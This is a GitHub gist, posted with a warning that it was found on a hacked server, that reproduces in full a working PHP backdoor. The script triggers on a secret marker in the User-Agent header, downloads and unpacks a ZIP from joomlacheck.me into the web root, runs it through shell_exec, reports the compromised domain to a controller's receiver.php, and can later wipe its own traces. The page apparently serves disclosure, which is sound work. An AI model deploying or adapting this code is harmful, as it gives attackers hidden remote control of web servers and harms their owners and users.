Created
June 29, 2020 13:56
-
-
Save fqx/b43b16329e1da1119cf16f05900a3d34 to your computer and use it in GitHub Desktop.
WARNING! This is a hacked file found on my server!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ignore_user_abort(true); | |
set_time_limit(0); | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
function getURL($url, $maxRedirs = 5, $timeout = 30) | |
{ | |
$ch = curl_init(); $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; $header[] = "Connection: keep-alive"; $header[] = "Keep-Alive: 300"; $header[] = "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3"; $header[] = "Pragma: "; curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_AUTOREFERER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); $content = curl_exec($ch); $response = curl_getinfo($ch); curl_close ($ch); if (($response['http_code'] == 301 OR $response['http_code'] == 302) AND $maxRedirs) if ($headers = get_headers($response['url'])) foreach($headers as $value) if (substr( strtolower($value), 0, 9 ) == "location:") { $locationURL = trim(substr($value, 9, strlen($value))); if (!preg_match('/^http/', $locationURL)) { $arUrl = parse_url($url); $locationURL = $arUrl['scheme'] . '://' . $arUrl['host'] . $locationURL; } return getURL($locationURL, --$maxRedirs, $timeout); } return ($content) ? $content : false; | |
} | |
$UA = $_SERVER['HTTP_USER_AGENT']; | |
$status = stristr($UA, '~'); | |
if ($status !== false) | |
{ | |
$status_2 = stristr($UA, 'rvf'); | |
if ($status_2 !== false) | |
{ | |
$res = $UA; | |
$res = stristr($res, '~'); | |
$res = substr($res, 1); | |
$pos_end = strpos($res, '~'); | |
$res = substr_replace($res, '', $pos_end, 9999); | |
$status = explode(":", $res); | |
if ($status[0] == 'start') | |
{ | |
$url_archive = 'http://joomlacheck.me/1.zip'; | |
$dir_for_work = '/temp/'; | |
$dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; | |
$archive_path = $dir_path.'1.zip'; | |
$script_name = $dir_path.'1.php'; | |
if (!is_dir($dir_path)) | |
mkdir($dir_path, 0777); | |
else | |
{ | |
$arr_filename = array (); | |
if (is_dir($dir_path)) | |
{ | |
if ($dh = opendir($dir_path)) | |
{ | |
while (($file = readdir($dh)) !== false) | |
{ | |
if (($file != ".") and ($file != "..")) $arr_filename[] = $file; | |
} | |
closedir($dh); | |
} | |
} | |
foreach ($arr_filename as $key) | |
{ | |
$key = trim($key); | |
$file_for_delete = "$dir_path/$key"; | |
$file_for_delete = str_replace('///', '/', $file_for_delete); | |
$file_for_delete = str_replace('//', '/', $file_for_delete); | |
$file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); | |
$file_for_check = str_replace('//', '/', $file_for_check); | |
if (substr_count($file_for_check, "/") >=2) | |
{ | |
if (file_exists($file_for_delete)) | |
unlink($file_for_delete); | |
if (file_exists($file_for_delete)) | |
{ | |
chmod($file_for_delete, 0777); | |
unlink($file_for_delete); | |
} | |
} | |
} | |
if (file_exists("error_log")) | |
unlink("error_log"); | |
if (is_dir($dir_path)) | |
rmdir($dir_path); | |
if (!is_dir($dir_path)) | |
mkdir($dir_path, 0777); | |
else | |
{ | |
echo '~Directory already exists~'; | |
exit; | |
} | |
} | |
if (is_dir($dir_path)) | |
{ | |
if (!copy($url_archive, $archive_path)) | |
{ | |
$arch = file_get_contents($url_archive); | |
if (($arch !== "") and ($arch !== " ") and ($arch !== null)) { $f = fopen ($archive_path, "w"); fwrite($f, $arch); fclose($f); } else { $ch = curl_init($url_archive); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($archive_path, $data); } } | |
if (file_exists($archive_path)) | |
{ | |
$zip = new ZipArchive; | |
$zip->open("$archive_path"); | |
$zip->extractTo("$dir_path"); | |
$zip->close(); | |
if (!file_exists($script_name)) | |
{ | |
$domain_name_2 = $_SERVER['SERVER_NAME']; | |
$unzip_path = $dir_path.'unzip.php'; | |
$data1 = '<?php $archive_path = $_SERVER[\'DOCUMENT_ROOT\']'; | |
$data2 = '.\'/'; | |
$data3 = $dir_for_work; | |
$data4 = "1.zip';"; | |
$data5 = '$output = shell_exec("unzip 1.zip");?>'; | |
$data = $data1.$data2.$data3.$data4.$data5; | |
$fas = fopen ($unzip_path, "w"); | |
fwrite($fas, $data); | |
fclose($fas); | |
$unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; | |
echo getURL($unzip_url); | |
} | |
} | |
else | |
{ | |
echo '~Can not upload archive!~'; | |
rmdir($dir_path); | |
exit; | |
} | |
if (file_exists($script_name)) | |
{ | |
echo '~Client has been activated!~'; | |
$file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; | |
$file = fopen($file_name,"rt"); | |
$original_file = fread($file,filesize($file_name)); | |
fclose($file); | |
$domain_name = $_SERVER['SERVER_NAME']; | |
$url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); exit; | |
} | |
else | |
{ | |
echo '~Can not unziped!~'; | |
unlink($archive_path); | |
rmdir($dir_path); | |
exit; | |
} | |
} | |
else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); } exit; } | |
} | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment